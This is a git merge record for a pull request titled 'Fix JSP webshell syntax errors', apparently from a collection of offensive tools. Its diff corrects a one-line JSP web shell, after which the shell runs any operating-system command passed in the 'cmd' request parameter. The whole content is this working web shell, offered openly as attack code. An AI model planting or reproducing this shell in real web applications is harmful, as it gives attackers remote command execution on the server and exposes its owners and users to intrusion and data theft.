Merge pull request #365 from wasamasa/fix-jsp-web-shell

Fix JSP webshell syntax errors
This commit is contained in:
g0tmi1k
2019-10-22 22:01:27 +01:00
committed by GitHub

View File

@@ -1,3 +1,3 @@
<% <%
Runtime.getruntime().exec(request.getParameter("cmd")) Runtime.getRuntime().exec(request.getParameter("cmd"));
%> %>